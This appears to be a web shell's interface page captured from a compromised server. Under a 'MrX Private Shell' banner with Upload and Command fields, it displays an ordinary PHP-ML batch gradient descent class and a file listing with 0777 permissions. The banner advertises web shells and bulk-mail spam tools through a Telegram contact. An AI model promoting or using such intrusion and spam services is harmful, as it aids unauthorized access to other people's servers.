__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

www-data@216.73.216.10: ~ $
<?php

declare(strict_types=1);

namespace Phpml\Helper\Optimizer;

use Closure;
use Phpml\Exception\InvalidOperationException;

/**
 * Batch version of Gradient Descent to optimize the weights
 * of a classifier given samples, targets and the objective function to minimize
 */
class GD extends StochasticGD
{
    /**
     * Number of samples given
     *
     * @var int|null
     */
    protected $sampleCount;

    public function runOptimization(array $samples, array $targets, Closure $gradientCb): array
    {
        $this->samples = $samples;
        $this->targets = $targets;
        $this->gradientCb = $gradientCb;
        $this->sampleCount = count($this->samples);

        // Batch learning is executed:
        $currIter = 0;
        $this->costValues = [];
        while ($this->maxIterations > $currIter++) {
            $theta = $this->theta;

            // Calculate update terms for each sample
            [$errors, $updates, $totalPenalty] = $this->gradient($theta);

            $this->updateWeightsWithUpdates($updates, $totalPenalty);

            $this->costValues[] = array_sum($errors) / (int) $this->sampleCount;

            if ($this->earlyStop($theta)) {
                break;
            }
        }

        $this->clear();

        return $this->theta;
    }

    /**
     * Calculates gradient, cost function and penalty term for each sample
     * then returns them as an array of values
     */
    protected function gradient(array $theta): array
    {
        $costs = [];
        $gradient = [];
        $totalPenalty = 0;

        if ($this->gradientCb === null) {
            throw new InvalidOperationException('Gradient callback is not defined');
        }

        foreach ($this->samples as $index => $sample) {
            $target = $this->targets[$index];

            $result = ($this->gradientCb)($theta, $sample, $target);
            [$cost, $grad, $penalty] = array_pad($result, 3, 0);

            $costs[] = $cost;
            $gradient[] = $grad;
            $totalPenalty += $penalty;
        }

        $totalPenalty /= $this->sampleCount;

        return [$costs, $gradient, $totalPenalty];
    }

    protected function updateWeightsWithUpdates(array $updates, float $penalty): void
    {
        // Updates all weights at once
        for ($i = 0; $i <= $this->dimensions; ++$i) {
            if ($i === 0) {
                $this->theta[0] -= $this->learningRate * array_sum($updates);
            } else {
                $col = array_column($this->samples, $i - 1);

                $error = 0;
                foreach ($col as $index => $val) {
                    $error += $val * $updates[$index];
                }

                $this->theta[$i] -= $this->learningRate *
                    ($error + $penalty * $this->theta[$i]);
            }
        }
    }

    /**
     * Clears the optimizer internal vars after the optimization process.
     */
    protected function clear(): void
    {
        $this->sampleCount = null;
        parent::clear();
    }
}

Filemanager

Name Type Size Permission Actions
ConjugateGradient.php File 8.34 KB 0777
GD.php File 2.97 KB 0777
Optimizer.php File 1.33 KB 0777
StochasticGD.php File 7.18 KB 0777
Filemanager